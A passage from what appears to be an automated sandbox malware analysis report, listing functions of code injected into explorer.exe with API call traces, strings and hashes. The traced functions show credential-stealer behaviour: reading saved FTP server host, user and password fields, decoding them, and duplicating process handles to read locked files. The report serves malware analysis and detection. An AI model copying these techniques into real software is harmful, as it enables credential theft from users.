                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                      Strings
                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 007E1B40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                      • API String ID: 2162223993-2036018995
                                                                                                                                      • Opcode ID: 4d5a176f666dc0affb3ede996eac313207b271116ae4a8a15fcfafe1c1e149f6
                                                                                                                                      • Instruction ID: e8e0c798e4a291fbf49006cf453eeb9658db2a1174b0e67af36f7b056e05f806
                                                                                                                                      • Opcode Fuzzy Hash: 4d5a176f666dc0affb3ede996eac313207b271116ae4a8a15fcfafe1c1e149f6
                                                                                                                                      • Instruction Fuzzy Hash: F1F02B727016C867C610252BDC89D2B3A4ED7C53A53420029F429C3202FD3A6C805174
                                                                                                                                      Function 007EA33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 007EA35F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID: winSeekFile
                                                                                                                                      • API String ID: 973152223-3168307952
                                                                                                                                      • Opcode ID: e152c4bb0f9f9c27801b573fa6ac78ab8128eb6f6159ed6c0d8544eb52933103
                                                                                                                                      • Instruction ID: 611db952870aa621d962829d823a31e6125f9a80dd7b34bc21d0697d442e870c
                                                                                                                                      • Opcode Fuzzy Hash: e152c4bb0f9f9c27801b573fa6ac78ab8128eb6f6159ed6c0d8544eb52933103
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0B434615344BFDB119F69DC05DBB77AAEB49320F108369F861C62D4DA30ED4096A1
                                                                                                                                      Function 007E9EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(05130000,00000000,?), ref: 007E9EB5
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 007E9ECD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                      • API String ID: 1279760036-667713680
                                                                                                                                      • Opcode ID: eb47a17df620d7bb980bd243e9fca0ce7579ccd8bddfcc1be3e613c565780897
                                                                                                                                      • Instruction ID: 5f59b4c928b010b91c80ae5bd5f5b52133e449deb771d97ea03fa6386b3286a5
                                                                                                                                      • Opcode Fuzzy Hash: eb47a17df620d7bb980bd243e9fca0ce7579ccd8bddfcc1be3e613c565780897
                                                                                                                                      • Instruction Fuzzy Hash: 21E0C27B609220BBC6226B95AC09F2FB769EBDAF10F050015FA00A6260C2389C41C7A2
                                                                                                                                      Function 007E9EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(05130000,00000000,?), ref: 007E9EF8
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 007E9F0E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                      • API String ID: 3298025750-4030396798
                                                                                                                                      • Opcode ID: 1cf7a02b4b7b529ed0a2d2c5d0ad598dec1b68a901e0f37dbfb1cf2637e9f82b
                                                                                                                                      • Instruction ID: df21c3bf7a81f8670fff9c5a8d9d3dec9044f6d2e4c75d90ed68657e5aff5c58
                                                                                                                                      • Opcode Fuzzy Hash: 1cf7a02b4b7b529ed0a2d2c5d0ad598dec1b68a901e0f37dbfb1cf2637e9f82b
                                                                                                                                      • Instruction Fuzzy Hash: 0BD0C27720D300B7C6006B52AC09F2B7779BB9AB00F440008F20095076C2689481EB62
                                                                                                                                      Function 007E1B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                      • Opcode ID: 08ee081dab0f5230bfb919fba42484b9eebaa81bb33e37f28a532aee8e5de60a
                                                                                                                                      • Instruction ID: 7bb124f141f3d0f82042722a6be75ea0224d341458e6591243f03e1b733e6ce9
                                                                                                                                      • Opcode Fuzzy Hash: 08ee081dab0f5230bfb919fba42484b9eebaa81bb33e37f28a532aee8e5de60a
                                                                                                                                      • Instruction Fuzzy Hash: B1D012B125367072D575173E7C5EEA76E1CEF4A6B5B444A14B41DE50D0E2288C9781E0
                                                                                                                                      Function 007E1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                      • Opcode ID: 2e3d7086ef33e85dbaeaabf1f29b0467e985bc181c49cc128d173b782068e11a
                                                                                                                                      • Instruction ID: de32ad43f2856f7dc70a15fa1238d4ef2bc129c0498e94a5d17408d623c5cfa7
                                                                                                                                      • Opcode Fuzzy Hash: 2e3d7086ef33e85dbaeaabf1f29b0467e985bc181c49cc128d173b782068e11a
                                                                                                                                      • Instruction Fuzzy Hash: FFA00275550104BBDD4557A89E0DA1E3528FBC4702F108944754586051EA6454149731
                                                                                                                                      Function 007E12A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000018), ref: 007E12B5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryZero
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 816449071-0
                                                                                                                                      • Opcode ID: 7486b2a4618d5f7e4c8111ee2535cb31a08bdfff0e97b70f15dbcf6d25f090cb
                                                                                                                                      • Instruction ID: fe26c6f8fa802f7049c37b567a5d1cfc5c1d70a7146dfe0d9d606911107d046b
                                                                                                                                      • Opcode Fuzzy Hash: 7486b2a4618d5f7e4c8111ee2535cb31a08bdfff0e97b70f15dbcf6d25f090cb
                                                                                                                                      • Instruction Fuzzy Hash: D011F5B1A01209AFDB10DFA9ED85ABEB7BCFB48341B50842AF945E3240E734DD00CB60
                                                                                                                                      Function 007E1B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,007E2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E1BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 6bed48f694c7a318b404bd34b2ebb7b36ca52bba1bd31f3d7738c43035d9a294
                                                                                                                                      • Instruction ID: a994271ebcdbfd11caf9cec08021f5f0dd466650503462ef23c0b97a3cb81e56
                                                                                                                                      • Opcode Fuzzy Hash: 6bed48f694c7a318b404bd34b2ebb7b36ca52bba1bd31f3d7738c43035d9a294
                                                                                                                                      • Instruction Fuzzy Hash: 66D0A9B3E13830828A6856393806892A2806A4467439A07B4FC26F30D0F238CC8282C0
                                                                                                                                      Function 007E1677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007E1684
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                      • Opcode ID: 55a0b173d0ea8a52c0b251d23ee405299e4c37e4a0e376c6619cf23a2cd50bee
                                                                                                                                      • Instruction ID: 691339c1d76b24e38842be00801bf300e44fd2c30f78f598c229d43355286b52
                                                                                                                                      • Opcode Fuzzy Hash: 55a0b173d0ea8a52c0b251d23ee405299e4c37e4a0e376c6619cf23a2cd50bee
                                                                                                                                      • Instruction Fuzzy Hash: FCC08C30121231EFE7301B348C0AB8636D4AF197B2F070D29E4C19D0C0E6F808C0CA90
                                                                                                                                      Function 007E105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,007E4A5B,?,?,00000000,?,?,?,?,007E4B66,?), ref: 007E1065
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: 3ad9fb4051c0feb23153ce1e7832a3a3266e13cd7e477531eab2f7fd045f0fd4
                                                                                                                                      • Instruction ID: f8b4de39ad7523f4c9bf6f1c17888e4e585019f322dfb280947cd050dbe11344
                                                                                                                                      • Opcode Fuzzy Hash: 3ad9fb4051c0feb23153ce1e7832a3a3266e13cd7e477531eab2f7fd045f0fd4
                                                                                                                                      • Instruction Fuzzy Hash: A0A00270690700B6EDB557245D0AF0936247B80B01F2089447241A90D159E5E0548A18
                                                                                                                                      Function 05C995DF Relevance: .1, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000003.2343273753.0000000005C99000.00000004.00000020.00020000.00000000.sdmp, Offset: 05C99000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_3_5c99000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fe7822a7aeb4388da78b925f957ded4322ca4c69ba813c0805c4b14e142f0a97
                                                                                                                                      • Instruction ID: 2476fed224f425aa2b1c6cc70a95f1ee9f7e2d0f8f737d1f41a4f368682c2cd2
                                                                                                                                      • Opcode Fuzzy Hash: fe7822a7aeb4388da78b925f957ded4322ca4c69ba813c0805c4b14e142f0a97
                                                                                                                                      • Instruction Fuzzy Hash: 3111104410F7C14FE30387705C7AA92BFB0AE03219B0E8ADBC0D5CA5A3D159885AC766

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 007E4440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.COMBASE(008362B0,00000000,00000001,008362A0,?), ref: 007E445F
                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 007E44AA
                                                                                                                                      • lstrcmpiW.KERNEL32(RecentServers,?), ref: 007E456E
                                                                                                                                      • lstrcmpiW.KERNEL32(Servers,?), ref: 007E457D
                                                                                                                                      • lstrcmpiW.KERNEL32(Settings,?), ref: 007E458C
                                                                                                                                        • Part of subcall function 007E11E1: lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,007E46E3), ref: 007E11ED
                                                                                                                                        • Part of subcall function 007E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E120F
                                                                                                                                        • Part of subcall function 007E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1231
                                                                                                                                      • lstrcmpiW.KERNEL32(Server,?), ref: 007E45BE
                                                                                                                                      • lstrcmpiW.KERNEL32(LastServer,?), ref: 007E45CD
                                                                                                                                      • lstrcmpiW.KERNEL32(Host,?), ref: 007E4657
                                                                                                                                      • lstrcmpiW.KERNEL32(Port,?), ref: 007E4679
                                                                                                                                      • lstrcmpiW.KERNEL32(User,?), ref: 007E469F
                                                                                                                                      • lstrcmpiW.KERNEL32(Pass,?), ref: 007E46C5
                                                                                                                                      • wsprintfW.USER32 ref: 007E471E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                      • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                      • API String ID: 2230072276-1234691226
                                                                                                                                      • Opcode ID: 8d9331121f1089aeb122c8a8794fb8e9e6eedb620dc015c50adaa224ed285964
                                                                                                                                      • Instruction ID: b363f2270c8dde9d7623c3ea0e304c52b24a3bf370e8a1e005bcef0152f93772
                                                                                                                                      • Opcode Fuzzy Hash: 8d9331121f1089aeb122c8a8794fb8e9e6eedb620dc015c50adaa224ed285964
                                                                                                                                      • Instruction Fuzzy Hash: 46B11771204342AFD700DF69C884E2AB7E9FFC9755F00896CF5958B260DB75E806CBA2
                                                                                                                                      Function 007E349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 007E34C0
                                                                                                                                        • Part of subcall function 007E33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 007E3401
                                                                                                                                      • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E34E9
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 007E351E
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 007E3541
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 007E3586
                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 007E358F
                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,File), ref: 007E35B6
                                                                                                                                      • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 007E35DE
                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 007E35F6
                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 007E3606
                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007E361E
                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 007E3631
                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 007E3658
                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 007E366B
                                                                                                                                      • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E3681
                                                                                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 007E36AD
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007E36C0
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E36F5
                                                                                                                                        • Part of subcall function 007E1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CC0
                                                                                                                                        • Part of subcall function 007E1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CDA
                                                                                                                                        • Part of subcall function 007E1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CE6
                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E3707
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                      • String ID: File
                                                                                                                                      • API String ID: 3915112439-749574446
                                                                                                                                      • Opcode ID: 689f8b5be34f3eff04a72406035566cd86d9a1f4063edba59a3b458326b93083
                                                                                                                                      • Instruction ID: 14238f4070146650d0a4f09098048f9e16947cb3f632d7b159a3def3a06dd138
                                                                                                                                      • Opcode Fuzzy Hash: 689f8b5be34f3eff04a72406035566cd86d9a1f4063edba59a3b458326b93083
                                                                                                                                      • Instruction Fuzzy Hash: F5619D70205380BFD710AF36CC89B2F7BE9FB88754F104928F946A72A1E779DA548B51
                                                                                                                                      Function 00834438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00834502
                                                                                                                                      • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0083475F
                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00834803
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                      • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                      • API String ID: 231171946-1096842476
                                                                                                                                      • Opcode ID: 5b39194a6059062389dfe4f3971c62a60fcb5dc0fe9e39a1775a488108d42e9e
                                                                                                                                      • Instruction ID: 29f3ac3e9e04b92c74a88bf790062dd01bc6b2620d89986f6f2ea901bbfaf6e7
                                                                                                                                      • Opcode Fuzzy Hash: 5b39194a6059062389dfe4f3971c62a60fcb5dc0fe9e39a1775a488108d42e9e
                                                                                                                                      • Instruction Fuzzy Hash: EEC10470A093858BEB34CE18849677AB7D1FBDA318F04252EE4D5C7252D728FC458BC6
                                                                                                                                      Function 00805F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E6AAA: memset.NTDLL ref: 007E6AC5
                                                                                                                                      • memset.NTDLL ref: 00805F53
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memset
                                                                                                                                      • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                      • API String ID: 2221118986-594550510
                                                                                                                                      • Opcode ID: 9cece84b7179eb6f5aea2e91cf1d2dfdb7d5e01e736d06dc6c9f4040b5b4f60d
                                                                                                                                      • Instruction ID: 018dadc4c48fc454b07175cbdf6e47508778fe180ac0bc3e8fdc75edb1c39358
                                                                                                                                      • Opcode Fuzzy Hash: 9cece84b7179eb6f5aea2e91cf1d2dfdb7d5e01e736d06dc6c9f4040b5b4f60d
                                                                                                                                      • Instruction Fuzzy Hash: 59C18B706047029FCB54DF25C884A2AB7E2FFC8714F04892DF854D7282EB35E962CB92
                                                                                                                                      Function 007E2112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 007E2127
                                                                                                                                      • _alldiv.NTDLL(?,?,00989680,00000000), ref: 007E213A
                                                                                                                                      • wsprintfA.USER32 ref: 007E214F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                      • String ID: %li
                                                                                                                                      • API String ID: 4120667308-1021419598
                                                                                                                                      • Opcode ID: e96278266daf0900c486078ba856fbae172e1aad9f1f51f2776d27413caa5d22
                                                                                                                                      • Instruction ID: 2d43ab2a28f55ba26abbaeb888984a2201d8833efb1ca79d3e1e4da2d1b2ac06
                                                                                                                                      • Opcode Fuzzy Hash: e96278266daf0900c486078ba856fbae172e1aad9f1f51f2776d27413caa5d22
                                                                                                                                      • Instruction Fuzzy Hash: D7E0D83264120877C7213BBC9C0BEEF7B6CEB80B15F004591F900E2182E5764B7483D5
                                                                                                                                      Function 007E123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,007E3E4B,00000000), ref: 007E124A
                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1268
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1295
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                      • Opcode ID: 147afb7946011c17f25a69eb9a07bae338b143939c5a68353ad0cf6888cbd2b5
                                                                                                                                      • Instruction ID: f5380d32a6c0e246ebd1bcbaa6f7a0de37c129388d9724cb100742a143392c6f
                                                                                                                                      • Opcode Fuzzy Hash: 147afb7946011c17f25a69eb9a07bae338b143939c5a68353ad0cf6888cbd2b5
                                                                                                                                      • Instruction Fuzzy Hash: CD014F71214345BFE718CF5ADC8AEBBB7ACFB85655F004A2EF50186250EBA29C058670
                                                                                                                                      Function 007E11E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,007E46E3), ref: 007E11ED
                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E120F
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1231
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                      • Opcode ID: b6ee58036414408076280a7c28f5ccf8b063fcdb354021b41b39676eec5cad1d
